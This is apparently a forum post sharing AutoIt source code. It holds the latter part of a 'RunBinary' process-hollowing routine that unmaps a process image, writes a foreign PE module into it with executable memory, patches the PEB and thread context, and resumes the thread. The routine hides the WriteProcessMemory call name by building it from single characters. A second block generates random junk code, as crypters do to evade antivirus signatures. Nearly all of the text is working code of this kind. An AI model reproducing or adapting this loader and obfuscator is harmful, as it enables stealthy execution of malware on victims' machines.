"uint64 ImageBase;" & _
"dword SectionAlignment;" & _
"dword FileAlignment;" & _
"word MajorOperatingSystemVersion;" & _
"word MinorOperatingSystemVersion;" & _
"word MajorImageVersion;" & _
"word MinorImageVersion;" & _
"word MajorSubsystemVersion;" & _
"word MinorSubsystemVersion;" & _
"dword Win32VersionValue;" & _
"dword SizeOfImage;" & _
"dword SizeOfHeaders;" & _
"dword CheckSum;" & _
"word Subsystem;" & _
"word DllCharacteristics;" & _
"uint64 SizeOfStackReserve;" & _
"uint64 SizeOfStackCommit;" & _
"uint64 SizeOfHeapReserve;" & _
"uint64 SizeOfHeapCommit;" & _
"dword LoaderFlags;" & _
"dword NumberOfRvaAndSizes", _
$pPointer)
; Move pointer
$pPointer += 112 ; size of $tIMAGE_OPTIONAL_HEADER
Else
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
; Extract entry point address
Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address
; And other interesting informations
Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory
Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers
; Move pointer
$pPointer += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT
$pPointer += 8 ; size of $tIMAGE_DIRECTORY_ENTRY_IMPORT
$pPointer += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
; Base Relocation Directory
Local $tIMAGE_DIRECTORY_ENTRY_BASERELOC = DllStructCreate("dword VirtualAddress; dword Size", $pPointer)
; Collect data
Local $pAddressNewBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "VirtualAddress")
Local $iSizeBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "Size")
Local $fRelocatable
If $pAddressNewBaseReloc And $iSizeBaseReloc Then $fRelocatable = True
If Not $fRelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) ; nothing can be done here
; Move pointer
$pPointer += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).
#Region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $fRelocate
Local $pZeroPoint
If $fRelocatable Then ; If the module can be relocated then allocate memory anywhere possible
$pZeroPoint = _RunBinary_AllocateExeSpace($hProcess, $iOptionalHeaderSizeOfImageNEW)
; In case of failure try at original address
If [MENTION=8708]error[/MENTION] Then
$pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
If [MENTION=8708]error[/MENTION] Then
_RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
; Try now
$pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
If [MENTION=8708]error[/MENTION] Then
; Return special error number:
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$fRelocate = True
Else ; And if not try where it should be
$pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
If [MENTION=8708]error[/MENTION] Then
_RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
; Try now
$pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
If [MENTION=8708]error[/MENTION] Then
; Return special error number:
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
; If there is new ImageBase value, save it
DllStructSetData($tIMAGE_OPTIONAL_HEADER, "ImageBase", $pZeroPoint)
#Region 7. CONSTRUCT THE NEW MODULE
; Allocate enough space (in our space) for the new module
Local $tModule = DllStructCreate("byte[" & $iOptionalHeaderSizeOfImageNEW & "]")
; Get pointer
Local $pModule = DllStructGetPtr($tModule)
; Headers
Local $tHeaders = DllStructCreate("byte[" & $iOptionalHeaderSizeOfHeadersNEW & "]", $pHEADERS_NEW)
; Write headers to $tModule
DllStructSetData($tModule, 1, DllStructGetData($tHeaders, 1))
; Write sections now. $pPointer is currently in place of sections
Local $tIMAGE_SECTION_HEADER
Local $iSizeOfRawData, $pPointerToRawData
Local $iVirtualAddress, $iVirtualSize
Local $tRelocRaw
; Loop through sections
For $i = 1 To $iNumberOfSections
$tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _
"dword UnionOfVirtualSizeAndPhysicalAddress;" & _
"dword VirtualAddress;" & _
"dword SizeOfRawData;" & _
"dword PointerToRawData;" & _
"dword PointerToRelocations;" & _
"dword PointerToLinenumbers;" & _
"word NumberOfRelocations;" & _
"word NumberOfLinenumbers;" & _
"dword Characteristics", _
$pPointer)
; Collect data
$iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")
$pPointerToRawData = $pHEADERS_NEW + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")
$iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")
$iVirtualSize = DllStructGetData($tIMAGE_SECTION_HEADER, "UnionOfVirtualSizeAndPhysicalAddress")
If $iVirtualSize And $iVirtualSize ; If there is data to write, write it
If $iSizeOfRawData Then
DllStructSetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pModule + $iVirtualAddress), 1, DllStructGetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pPointerToRawData), 1))
EndIf
; Relocations
If $fRelocate Then
If $iVirtualAddress $pAddressNewBaseReloc Then
$tRelocRaw = DllStructCreate("byte[" & $iSizeBaseReloc & "]", $pPointerToRawData + ($pAddressNewBaseReloc - $iVirtualAddress))
EndIf
EndIf
; Move pointer
$pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure
Next
; Fix relocations
If $fRelocate Then _RunBinary_FixReloc($pModule, $tRelocRaw, $pZeroPoint, $pOptionalHeaderImageBaseNEW, $iMagic = 523)
; Write newly constructed module to allocated space inside the $hProcess
$aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _
"handle", $hProcess, _
"ptr", $pZeroPoint, _
"ptr", $pModule, _
"dword_ptr", $iOptionalHeaderSizeOfImageNEW, _
"dword_ptr*", 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(7, 0, 0) ; failure while writting new module binary
EndIf
#Region 8. PEB ImageBaseAddress MANIPULATION
; PEB structure definition
Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _
"byte ReadImageFileExecOptions;" & _
"byte BeingDebugged;" & _
"byte Spare;" & _
"ptr Mutant;" & _
"ptr ImageBaseAddress;" & _
"ptr LoaderData;" & _
"ptr ProcessParameters;" & _
"ptr SubSystemData;" & _
"ptr ProcessHeap;" & _
"ptr FastPebLock;" & _
"ptr FastPebLockRoutine;" & _
"ptr FastPebUnlockRoutine;" & _
"dword EnvironmentUpdateCount;" & _
"ptr KernelCallbackTable;" & _
"ptr EventLogSection;" & _
"ptr EventLog;" & _
"ptr FreeList;" & _
"dword TlsExpansionCounter;" & _
"ptr TlsBitmap;" & _
"dword TlsBitmapBits[2];" & _
"ptr ReadOnlySharedMemoryBase;" & _
"ptr ReadOnlySharedMemoryHeap;" & _
"ptr ReadOnlyStaticServerData;" & _
"ptr AnsiCodePageData;" & _
"ptr OemCodePageData;" & _
"ptr UnicodeCaseTableData;" & _
"dword NumberOfProcessors;" & _
"dword NtGlobalFlag;" & _
"byte Spare2[4];" & _
"int64 CriticalSectionTimeout;" & _
"dword HeapSegmentReserve;" & _
"dword HeapSegmentCommit;" & _
"dword HeapDeCommitTotalFreeThreshold;" & _
"dword HeapDeCommitFreeBlockThreshold;" & _
"dword NumberOfHeaps;" & _
"dword MaximumNumberOfHeaps;" & _
"ptr ProcessHeaps;" & _
"ptr GdiSharedHandleTable;" & _
"ptr ProcessStarterHelper;" & _
"ptr GdiDCAttributeList;" & _
"ptr LoaderLock;" & _
"dword OSMajorVersion;" & _
"dword OSMinorVersion;" & _
"dword OSBuildNumber;" & _
"dword OSPlatformId;" & _
"dword ImageSubSystem;" & _
"dword ImageSubSystemMajorVersion;" & _
"dword ImageSubSystemMinorVersion;" & _
"dword GdiHandleBuffer[34];" & _
"dword PostProcessInitRoutine;" & _
"dword TlsExpansionBitmap;" & _
"byte TlsExpansionBitmapBits[128];" & _
"dword SessionId")
; Fill the structure
$aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", _
"ptr", $hProcess, _
"ptr", $pPEB, _ ; pointer to PEB structure
"ptr", DllStructGetPtr($tPEB), _
"dword_ptr", DllStructGetSize($tPEB), _
"dword_ptr*", 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
EndIf
; Change base address within PEB
DllStructSetData($tPEB, "ImageBaseAddress", $pZeroPoint)
; Write the changes
$aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _
"handle", $hProcess, _
"ptr", $pPEB, _
"ptr", DllStructGetPtr($tPEB), _
"dword_ptr", DllStructGetSize($tPEB), _
"dword_ptr*", 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(9, 0, 0) ; failure while changing base address
EndIf
#Region 9. NEW ENTRY POINT
; Entry point manipulation
Switch $iRunFlag
Case 1
DllStructSetData($tCONTEXT, "Eax", $pZeroPoint + $iEntryPointNEW)
Case 2
DllStructSetData($tCONTEXT, "Rcx", $pZeroPoint + $iEntryPointNEW)
Case 3
; FIXME - Itanium architecture
EndSwitch
#Region 10. SET NEW CONTEXT
; New context:
$aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", _
"handle", $hThread, _
"ptr", DllStructGetPtr($tCONTEXT))
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
EndIf
#Region 11. RESUME THREAD
; And that's it!. Continue execution:
$aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or $aCall[0] = -1 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
EndIf
#Region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hProcess)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread)
; All went well. Return new PID:
Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")
EndFunc
Func _RunBinary_LeanAndMean()
Local $aArr[18] = ["W", "r", "i", "t", "e", "P", "r", "o", "c", "e", "s", "s", "M", "e", "m", "o", "r", "y"], $sOut
For $sChar In $aArr
$sOut &= $sChar
Next
Return $sOut
EndFunc
Func _RunBinary_FixReloc($pModule, $tData, $pAddressNew, $pAddressOld, $fImageX64)
Local $iDelta = $pAddressNew - $pAddressOld ; dislocation value
Local $iSize = DllStructGetSize($tData) ; size of data
Local $pData = DllStructGetPtr($tData) ; addres of the data structure
Local $tIMAGE_BASE_RELOCATION, $iRelativeMove
Local $iVirtualAddress, $iSizeofBlock, $iNumberOfEntries
Local $tEnries, $iData, $tAddress
Local $iFlag = 3 + 7 * $fImageX64 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
While $iRelativeMove $tIMAGE_BASE_RELOCATION = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pData + $iRelativeMove)
$iVirtualAddress = DllStructGetData($tIMAGE_BASE_RELOCATION, "VirtualAddress")
$iSizeofBlock = DllStructGetData($tIMAGE_BASE_RELOCATION, "SizeOfBlock")
$iNumberOfEntries = ($iSizeofBlock - 8) / 2
$tEnries = DllStructCreate("word[" & $iNumberOfEntries & "]", DllStructGetPtr($tIMAGE_BASE_RELOCATION) + 8)
; Go through all entries
For $i = 1 To $iNumberOfEntries
$iData = DllStructGetData($tEnries, 1, $i)
If BitShift($iData, 12) = $iFlag Then ; check type
$tAddress = DllStructCreate("ptr", $pModule + $iVirtualAddress + BitAND($iData, 0xFFF)) ; the rest of $iData is offset
DllStructSetData($tAddress, 1, DllStructGetData($tAddress, 1) + $iDelta) ; this is what's this all about
EndIf
Next
$iRelativeMove += $iSizeofBlock
WEnd
Return 1 ; all OK!
EndFunc
Func _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pAddress, $iSize)
; Allocate
Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
"handle", $hProcess, _
"ptr", $pAddress, _
"dword_ptr", $iSize, _
"dword", 0x1000, _ ; MEM_COMMIT
"dword", 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then
; Try differently
$aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
"handle", $hProcess, _
"ptr", $pAddress, _
"dword_ptr", $iSize, _
"dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
"dword", 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
EndIf
Return $aCall[0]
EndFunc
Func _RunBinary_AllocateExeSpace($hProcess, $iSize)
; Allocate space
Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
"handle", $hProcess, _
"ptr", 0, _
"dword_ptr", $iSize, _
"dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
"dword", 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate
Return $aCall[0]
EndFunc
Func _RunBinary_UnmapViewOfSection($hProcess, $pAddress)
DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _
"ptr", $hProcess, _
"ptr", $pAddress)
; Check for errors only
If [MENTION=8708]error[/MENTION] Then Return SetError(1, 0, 0) ; Failure
Return 1
EndFunc
Func _RunBinary_IsWow64Process($hProcess)
Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", _
"handle", $hProcess, _
"bool*", 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Failure
Return $aCall[2]
EndFunc
Code:
>Func _RandomVersion()
$rVersion = ""
Dim $aRr[3]
$digits = Random(2, 4, 1)
For $i = 1 To $digits
$aRr[0] = Chr(Random(48, 57, 1)) & "."
$aRr[1] = Chr(Random(48, 57, 1)) & "."
$aRr[2] = Chr(Random(48, 57, 1)) & "."
$arR2 = Chr(Random(48, 57, 1))
$rVersion &= $aRr[Random(0, 2, 1)] & $arR2
Next
Return $rVersion
EndFunc
Func _RandomString()
$rString = ""
Dim $aRr[3]
$digits = Random(10, 15, 1)
For $i = 1 To $digits
$aRr[0] = Chr(Random(65, 90, 1))
$aRr[1] = Chr(Random(97, 122, 1))
$aRr[2] = Chr(Random(48, 57, 1))
$rString &= $aRr[Random(0, 2, 1)]
Next
Return $rString
EndFunc
Func _JunkVariables()
$var = ""
$varval = ""
Dim $aRr[3]
$digits = Random(10, 15, 1)
For $i = 1 To $digits
$aRr[0] = Chr(Random(65, 90, 1))
$aRr[1] = Chr(Random(97, 122, 1))
$aRr[2] = Chr(Random(48, 57, 1))
$var &= $aRr[Random(0, 2, 1)]
$varval &= $aRr[Random(0, 2, 1)]
$variable = '$' & $var & ' = ' & '"' & $varval & '"' & @CRLF
Next
Return $variable
EndFunc
Func _JunkFor()
$rString = _RandomString()
$variable = _JunkVariables()
$JunkFor = "For $" & $rString & " = 1 To " & Random(1, 15) & @CRLF & " " & $variable & "Next" & @CRLF
Return $JunkFor
EndFunc
Func _JunkIfElse()
$rString = _RandomString()
$rString2 = _RandomString()
$variable = _JunkVariables()
$JunkIf = 'If ' & '"' & $rString & '" == "' & $rString2 & '" Then' & @CRLF & ' ' & $variable & 'EndIf' & @CRLF
Return $JunkIf
Endfunc
Func _FunJunk($Value)
$JunkFun = ""
Dim $Round[4]
For $i = 1 To $Value
$Round[0] = _JunkVariables()
$Round[2] = _JunkFor()
$Round[3] = _JunkIfElse()
$JunkFun &= $Round[Random(0, 3, 1)]
Next
Return $JunkFun
EndFunc
Func _RanParameters($Value)
$JunkParam = ""
For $i = 1 To $Value
$JunkParam = "$" & _RandomString() & ", "
Next
Return $JunkParam
EndFunc
Func _JunkFunc()
$FuncName = ""
$Parameters = ""
$Lparam = ""
Dim $aRr[3]
$digits = Random(7, 10, 1)
$digits2 = Random(2, 5, 1)
$digits3 = Random(1, 3, 1)
$lastP = _RandomString()
$Lparam &= "$" & $lastP
$Parameters &= _RanParameters($digits3)
For $i = 1 To $digits
$aRr[0] = Chr(Random(65, 90, 1))
$aRr[1] = Chr(Random(97, 122, 1))
$aRr[2] = Chr(Random(48, 57, 1))
$FuncName &= $aRr[Random(0, 2, 1)]
$RanFun = _FunJunk($digits2)
$Function = 'Func ' & '_' & $FuncName & '(' & $Parameters & $Lparam & ')' & @CRLF & $RanFun & @CRLF & 'EndFunc' & @CRLF
Next
Return $Function
EndFunc
Func _JunkCreate($Value)
$JunkCode = ""
Dim $Round[4]
For $i = 1 To $Value
$Round[0] = _JunkVariables()
$Round[1] = _JunkFunc()
$Round[2] = _JunkFor()
$Round[3] = _JunkIfElse()
$JunkCode &= $Round[Random(0, 3, 1)]
Next
Return $JunkCode
EndFunc